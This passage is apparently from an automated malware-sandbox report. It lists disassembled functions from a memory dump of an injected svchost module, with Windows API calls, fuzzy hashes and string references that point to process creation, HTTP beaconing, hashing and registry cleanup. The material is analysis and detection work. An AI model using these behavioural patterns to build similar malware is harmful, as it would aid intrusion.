GetProcessHeap.KERNEL32(00000008,00000009), ref: 027E38D6
RtlAllocateHeap.NTDLL(00000000), ref: 027E38DD
_vsnprintf.MSVCRT ref: 027E38F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E390C
HeapFree.KERNEL32(00000000), ref: 027E3913

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: 5c5ffdb0c24a8dd72bba7c055fa24d24b8ab7e9c26e2d8adb3e14f4d05cdf9bc
Instruction ID: 3b6ae12f20dff803adfce039f78f299e3289ce4c173fe1bc587e918538a82640
Opcode Fuzzy Hash: 5c5ffdb0c24a8dd72bba7c055fa24d24b8ab7e9c26e2d8adb3e14f4d05cdf9bc
Instruction Fuzzy Hash: AB018F72540209BFEF115AA4DC09F7B77ACEB8D654F0588A5FE1ADB140E730DA118B70

Uniqueness

Uniqueness Score: -1.00%

Function 027E4423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(027E30CE,00000000,?,027E30CE,?), ref: 027E4433
GetProcessHeap.KERNEL32(00000008), ref: 027E4447
RtlAllocateHeap.NTDLL(00000000), ref: 027E444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 027E4465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E4471
HeapFree.KERNEL32(00000000), ref: 027E4478

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: da78e73357d18ad800fd7c3f0d992edb5bb61af6ba5c9cd545ee744dd4681d7f
Instruction ID: aecdbdc3af74ba89283db138ba3e647e0e4d03f2006c0e5ce482a20287d205c6
Opcode Fuzzy Hash: da78e73357d18ad800fd7c3f0d992edb5bb61af6ba5c9cd545ee744dd4681d7f
Instruction Fuzzy Hash: F3F04F71A45252EBDF251B26AC1CE6BBE6CEFCEB26B01C918F4469A004D7308415D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 027E16FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,027E17FB,00000001), ref: 027E1708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 027E1722
RtlAllocateHeap.NTDLL(00000000), ref: 027E1729
ExpandEnvironmentStringsA.KERNEL32(027E138F,00000000,-00000040), ref: 027E173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E1747
HeapFree.KERNEL32(00000000), ref: 027E174E

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: c7b5b72481f2be7373e526e46d4b16f9107a8e92b97e50ff57c84e65748bcaca
Instruction ID: b3325248e496cded93ecbf08cbfb7aec92785b6904387a128504ee4dddfe71cf
Opcode Fuzzy Hash: c7b5b72481f2be7373e526e46d4b16f9107a8e92b97e50ff57c84e65748bcaca
Instruction Fuzzy Hash: 2DF09031A44352E7DF251B64AC0EF4B7AA9ABCDA51F418814F94ADA144D730CC149770

Uniqueness

Uniqueness Score: -1.00%

Function 027E3332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,027E60A0), ref: 027E333C
QueryPerformanceCounter.KERNEL32(?), ref: 027E334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 027E3372
GetTickCount.KERNEL32 ref: 027E337A

Strings

&%c=%u, xrefs: 027E3332

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: 2c1c2dbafad76ab39b3c00d4e3d53c9b6116739f6f4a44dfda7aff16d1c5a7ae
Instruction ID: b5cbe75491d10d1ba76ffd98553f61337f2317304ab4e8ac56a72d6b783d5d73
Opcode Fuzzy Hash: 2c1c2dbafad76ab39b3c00d4e3d53c9b6116739f6f4a44dfda7aff16d1c5a7ae
Instruction Fuzzy Hash: 6BF0BD31E50109EBDF14DFE4D845EAEBBB9FB49301F448894F516EB150DB31A6109B60

Uniqueness

Uniqueness Score: -1.00%

Function 027E175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 027E1784

Part of subcall function 027E16FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,027E17FB,00000001), ref: 027E1708

GetProcessHeap.KERNEL32(00000000,?), ref: 027E180F
HeapFree.KERNEL32(00000000), ref: 027E1816

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: 9f4ac1e810fa028d25b705d8e962a2c9f0fd85c29a69b4f19e9695a245d0e696
Instruction ID: c544b0d6ac55cc2ed2a6f68f37010098e7a2e03467e5d9a4767d49f6de3b610e
Opcode Fuzzy Hash: 9f4ac1e810fa028d25b705d8e962a2c9f0fd85c29a69b4f19e9695a245d0e696
Instruction Fuzzy Hash: 7931C072A083129FEF1A9E649846B3B7BE8AB4E651F50446DF487D6144EB30D801CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 027E5348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 027E5367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,027E50BA,00000000), ref: 027E537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,027E50BA,00000000), ref: 027E538C
RtlAllocateHeap.NTDLL(00000000), ref: 027E5393
lstrcpy.KERNEL32(00000000,?), ref: 027E53A3

Part of subcall function 027E4543: StrStrIA.SHLWAPI(?,?,?,?,027E712C,027E62E4,027E7224,?), ref: 027E4563

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: 10698a2deab29fc69cc24c36e958e2c98462aa445ae18f7c420c43698bca4001
Instruction ID: 04dd561243f133888e3f9d5368ffa35286528fd6e5a7d261727af3ee7f3e7539
Opcode Fuzzy Hash: 10698a2deab29fc69cc24c36e958e2c98462aa445ae18f7c420c43698bca4001
Instruction Fuzzy Hash: 66116DB2D4422DAAEF06EBE0DC09CFFB7ACEF0D605B140456F903D6000EA7096058BB5

Uniqueness

Uniqueness Score: -1.00%

Function 027E3763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,027E36F0,027E1134,?), ref: 027E378E
RtlAllocateHeap.NTDLL(00000000,?,027E36F0), ref: 027E3795
_vsnprintf.MSVCRT ref: 027E37AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,027E36F0,027E1134,?), ref: 027E37EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,027E36F0,027E1134,?), ref: 027E37F3

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: 803a150dc0a9bbc9a52e6315bd14b14b5a5c5f8c97b508ba3c27bbe844c9bf3b
Instruction ID: 3ca4acd607d2e9238936c500c68c5dcef42f0a823ac44ddb1bb7a2a4ac7721b7
Opcode Fuzzy Hash: 803a150dc0a9bbc9a52e6315bd14b14b5a5c5f8c97b508ba3c27bbe844c9bf3b
Instruction Fuzzy Hash: B301C872545206FFDF021A75AC49F777A6AEFCD364F008864FA168B114EA318D219B71

Uniqueness

Uniqueness Score: -1.00%

Function 027E4F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 027E4F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 027E4F84
CloseHandle.KERNEL32(00000000), ref: 027E4F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 027E4FB5
HeapFree.KERNEL32(00000000), ref: 027E4FBC

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: 12910fb26345e0644d46cc240fb0614e014daaea08f093273c8fcd320b02e3ea
Instruction ID: cd0720cae9db5f9b4567935b3fc023eccd172ad5803084d2fb4178e5e5be757d
Opcode Fuzzy Hash: 12910fb26345e0644d46cc240fb0614e014daaea08f093273c8fcd320b02e3ea
Instruction Fuzzy Hash: 3FF0BB32C45225FBDF255F90DC1CB9E7668EF0E725F148614F90699044C7304A1187F1

Uniqueness

Uniqueness Score: -1.00%

Function 027E21C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 027E2225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 027E225A
RtlAllocateHeap.NTDLL(00000000), ref: 027E2261

Strings

f<v, xrefs: 027E23B0

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: c9c614d257856c46855287767aaf93a01bb880d80a58eb1cad5c7bdf7c6c48d4
Instruction ID: 78fd01747a803e22cc02b8330ea4f13bc5e9a385131e3348228a152741589300
Opcode Fuzzy Hash: c9c614d257856c46855287767aaf93a01bb880d80a58eb1cad5c7bdf7c6c48d4
Instruction Fuzzy Hash: EB81BF72908351AADB21DF64DC44A67BBECAF9D300F05486EFC86D7151E7349904CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 027E315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 027E32A2
RtlAllocateHeap.NTDLL(00000000), ref: 027E32AF

Strings

GET, xrefs: 027E31D0, 027E31DC
POST, xrefs: 027E31B9

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: f3eb7ac13aebe002a4a930649877a88f77d6b57f7540343751aa9b1e2152f3a7
Instruction ID: 89950afa2fbf9a74a4952600a661d1f31290a439a212e41a00160222ca584035
Opcode Fuzzy Hash: f3eb7ac13aebe002a4a930649877a88f77d6b57f7540343751aa9b1e2152f3a7
Instruction Fuzzy Hash: 995138B1644746AFEB248F29DC84F3BBAECFB88604F048959B992D7140DB34D8188B71

Uniqueness

Uniqueness Score: -1.00%

Function 027E3923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 027E392F
memset.MSVCRT ref: 027E3983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 027E39B3

Strings

D, xrefs: 027E398B

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: dc1146fb7c725b3948380a95bb20f46f787dd68dacb199f7c492c764ed4a5daf
Instruction ID: 679660927a4d0f9c0299054d57174c1cf16c97999ddf7da212d26c45ffe5eca7
Opcode Fuzzy Hash: dc1146fb7c725b3948380a95bb20f46f787dd68dacb199f7c492c764ed4a5daf
Instruction Fuzzy Hash: FB119672804319EBCB10AF21DC04D6BBBACEFC9658F024A19FD55E3150D73299158BB2

Uniqueness

Uniqueness Score: -1.00%

Function 027E4EEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56processthreadCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,027E4EC9,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 027E4F35

Part of subcall function 027E49EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000), ref: 027E4A7A
Part of subcall function 027E49EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000,?,?,?), ref: 027E4A81
Part of subcall function 027E49EE: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000), ref: 027E4A92
Part of subcall function 027E49EE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000,?,?,?), ref: 027E4A99

ResumeThread.KERNEL32(027E49A2,?,?,?), ref: 027E4F51
CloseHandle.KERNEL32(027E49A2,?,?,?), ref: 027E4F5A

Strings

D, xrefs: 027E4F02

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$CloseCreateHandleResumeThread
String ID: D
API String ID: 2798461596-2746444292
Opcode ID: bd83627399425d41e91f82e92e8a16bd4bdf76bc9413402255916f467ce0d712
Instruction ID: b62d38b18558cfcd4150b74f1e094b2fa1cca8e2bb6cb270aa62f340e1d34911
Opcode Fuzzy Hash: bd83627399425d41e91f82e92e8a16bd4bdf76bc9413402255916f467ce0d712
Instruction Fuzzy Hash: 8901E9B290420CBFEF419AE8DC85DEFB7BDEB4C704B000865F606E6050E6319D148A71

Uniqueness

Uniqueness Score: -1.00%

Function 027E27E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 027E27F9
CreateProcessW.KERNEL32(00000000,027E62F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 027E2825
ExitProcess.KERNEL32 ref: 027E282C

Strings

D, xrefs: 027E2800

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: b9047a4f602bd3250efd60d6f56c07495b112cb7e8fd73fee732f8091802f8f5
Instruction ID: 9514badb79cf12c79c7cea7048a3a85d25d0e5932fdf8dcfe3064591c88bde21
Opcode Fuzzy Hash: b9047a4f602bd3250efd60d6f56c07495b112cb7e8fd73fee732f8091802f8f5
Instruction Fuzzy Hash: FEE0E5F184064CBFEB40D6F4CD85DAFB77CAB48704F004825B706E5050D6749D1C4676

Uniqueness

Uniqueness Score: -1.00%

Function 027E5208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E525E
Sleep.KERNEL32(00001388), ref: 027E5271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E528A
GetProcessHeap.KERNEL32(00000000,?), ref: 027E5327
GetProcessHeap.KERNEL32(00000000,?), ref: 027E5333

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: 576cf2f734af197cd20d2f69c73af8ccec8c4e152f94f25ec538de2c20c8fdbb
Instruction ID: 2c3c27f84532f8fede21763cfe17c9d030180890bdb45251d25d4fa31921053a
Opcode Fuzzy Hash: 576cf2f734af197cd20d2f69c73af8ccec8c4e152f94f25ec538de2c20c8fdbb
Instruction Fuzzy Hash: 0241CCB25043049BCB21DFA4C848B6BB7E8AF8C31DF840E1DF59696190D770D558CB72

Uniqueness

Uniqueness Score: -1.00%

Function 027E5B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 027E5B64

Part of subcall function 027E2F1A: CryptAcquireContextW.ADVAPI32(027E7658,00000000,00000000,00000001,F0000000,027E62B0,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2F35
Part of subcall function 027E2F1A: CryptCreateHash.ADVAPI32(027E7658,00008003,00000000,00000000,?,00000000,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2F52
Part of subcall function 027E2F1A: CryptHashData.ADVAPI32(?,027E7658,?,00000000,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2F68
Part of subcall function 027E2F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2F83
Part of subcall function 027E2F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,027E5B88,?,00000000,?), ref: 027E2FA3
Part of subcall function 027E2F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2FB3
Part of subcall function 027E2F1A: CryptReleaseContext.ADVAPI32(027E7658,00000000,?,?,?,027E5B88,?,00000000,?,?,027E7658,?), ref: 027E2FC2

Part of subcall function 027E44D2: wsprintfA.USER32 ref: 027E4509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 027E5BF4

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: a7e80fe4751a93dc7435fb7ab45fcc9b08eedee28f57343fe90cee6d8f2bf257
Instruction ID: eec585b2f0bcf730a2244fd89926c1b921f929022c08d12445026f548ddae9f9
Opcode Fuzzy Hash: a7e80fe4751a93dc7435fb7ab45fcc9b08eedee28f57343fe90cee6d8f2bf257
Instruction Fuzzy Hash: 5921CC7244424D9EDF168FA4DC94AEABBACEB0D319F544856F906D6102D7309684CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 027E3803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,027E3904,?,00000000,00000000,00000000,00000007,?,?), ref: 027E3855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,027E3904), ref: 027E385C

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: f3bdc8b664ad92ecce1423191946c011698a27ef52b4246a9dc8633c6f3b3038
Instruction ID: 1a5facc44c697ca2ede8becb10bfb07e8ab8e6e5dd92dff1d80470c5e875cf1b
Opcode Fuzzy Hash: f3bdc8b664ad92ecce1423191946c011698a27ef52b4246a9dc8633c6f3b3038
Instruction Fuzzy Hash: 39119A72A003418BCB348E68D845B76B7E9AF8D605F1888ADE5E6CB204D730E481CB30

Uniqueness

Uniqueness Score: -1.00%

Function 027E540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 027E542D
RtlAllocateHeap.NTDLL(00000000), ref: 027E5434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E5496
HeapFree.KERNEL32(00000000), ref: 027E549D

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 6741c389457412119efd04ee82c0399d374af251301412a989e9743bc2dbc2b5
Instruction ID: c073a36f4aaacc11154a5867768c729c3e135755175aca723ad0f57b3aacd614
Opcode Fuzzy Hash: 6741c389457412119efd04ee82c0399d374af251301412a989e9743bc2dbc2b5
Instruction Fuzzy Hash: 4C112977900318ABCF219EB99C4CEA7B76DAF8E715F448565FE4AE7105EA30D80487B0

Uniqueness

Uniqueness Score: -1.00%

Function 027E4AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000), ref: 027E4AD7
RtlAllocateHeap.NTDLL(00000000), ref: 027E4ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 027E4B0A
RtlAllocateHeap.NTDLL(00000000), ref: 027E4B11

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 9445bfc701b7627038988ae6d8ab0ad359d4a2a971f84d3bff252ae2db3b92e4
Instruction ID: 1f545579009a796bc5bdd98dd9bf38cfd70ef6aebc63148494e3e3506f34bcfd
Opcode Fuzzy Hash: 9445bfc701b7627038988ae6d8ab0ad359d4a2a971f84d3bff252ae2db3b92e4
Instruction Fuzzy Hash: FB115A75A40702EBEF719F75DC19B16B7E4AB4C314F088929F687CA694EB31D410DB28

Uniqueness

Uniqueness Score: -1.00%

Function 027E1496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E14DF
HeapFree.KERNEL32(00000000), ref: 027E14E6

Strings

!, xrefs: 027E14A3
!, xrefs: 027E14C6

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: 2ef07755038f83805ad6fbabbbe8833364ae160199e100ac32b18400afd8c5e0
Instruction ID: 5be900d5c4c5b42b76421f76e6e56d91bb87a3e03201471def8370d38b38669a
Opcode Fuzzy Hash: 2ef07755038f83805ad6fbabbbe8833364ae160199e100ac32b18400afd8c5e0
Instruction Fuzzy Hash: 45F06D72684214AEFF155A64DC4ABF67B9DEF0E650F888411FD0AC9280EA70DDA086B0

Uniqueness

Uniqueness Score: -1.00%

Function 027E25E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,027E7328), ref: 027E25F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 027E2612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 027E2623
GetLastError.KERNEL32 ref: 027E262D

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: 728242e03c781aefbef10a131642072453ed500121fe55768294e73e1263737d
Instruction ID: d4050b9866401333b032b87997986fa0e17204ef2b345bd5ea9ab5356cf2626b
Opcode Fuzzy Hash: 728242e03c781aefbef10a131642072453ed500121fe55768294e73e1263737d
Instruction Fuzzy Hash: 60F03671544249EBEF2456B69C4DE6FBBBCEBCDB05F40401EF806C5140EA2594158B31

Uniqueness

Uniqueness Score: -1.00%

Function 027E49EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000), ref: 027E4A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000,?,?,?), ref: 027E4A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000), ref: 027E4A92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,027E4F4C,?,00000000,?,?,?), ref: 027E4A99

Part of subcall function 027E4B3F: lstrcpy.KERNEL32(-00000469,?), ref: 027E4C69

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: f155f83ac730c167cc43966f36c933550e45ce75ca83d1f9a10032851c1ed80d
Instruction ID: c74e28da1fa83ffce8b9e9f9caa4225827eff164aa3a8bf38c1e4735ecafb9fa
Opcode Fuzzy Hash: f155f83ac730c167cc43966f36c933550e45ce75ca83d1f9a10032851c1ed80d
Instruction Fuzzy Hash: 00214D76808315AFCB14DFA4D85494BBBE8FB8C264F04491EF58AD7200D730DA449BA9

Uniqueness

Uniqueness Score: -1.00%

Function 027E136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E13EC
HeapFree.KERNEL32(00000000), ref: 027E13F3

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 11cb2995078f56bf3854d289c3131db248e954779944c86fb8173a16089d10f1
Instruction ID: 8b10cff963fa5daf2d919c6b2e971ab73fdeb44048cb6544be4bff2460a2dcf0
Opcode Fuzzy Hash: 11cb2995078f56bf3854d289c3131db248e954779944c86fb8173a16089d10f1
Instruction Fuzzy Hash: 891151B6D00209ABDF00DFE5D885BDFBBBCEB4D351F504565E60AE6100E7708A108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 027E1404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E146A
HeapFree.KERNEL32(00000000), ref: 027E1471
GetProcessHeap.KERNEL32(00000000,?), ref: 027E147E
HeapFree.KERNEL32(00000000), ref: 027E1485

Memory Dump Source

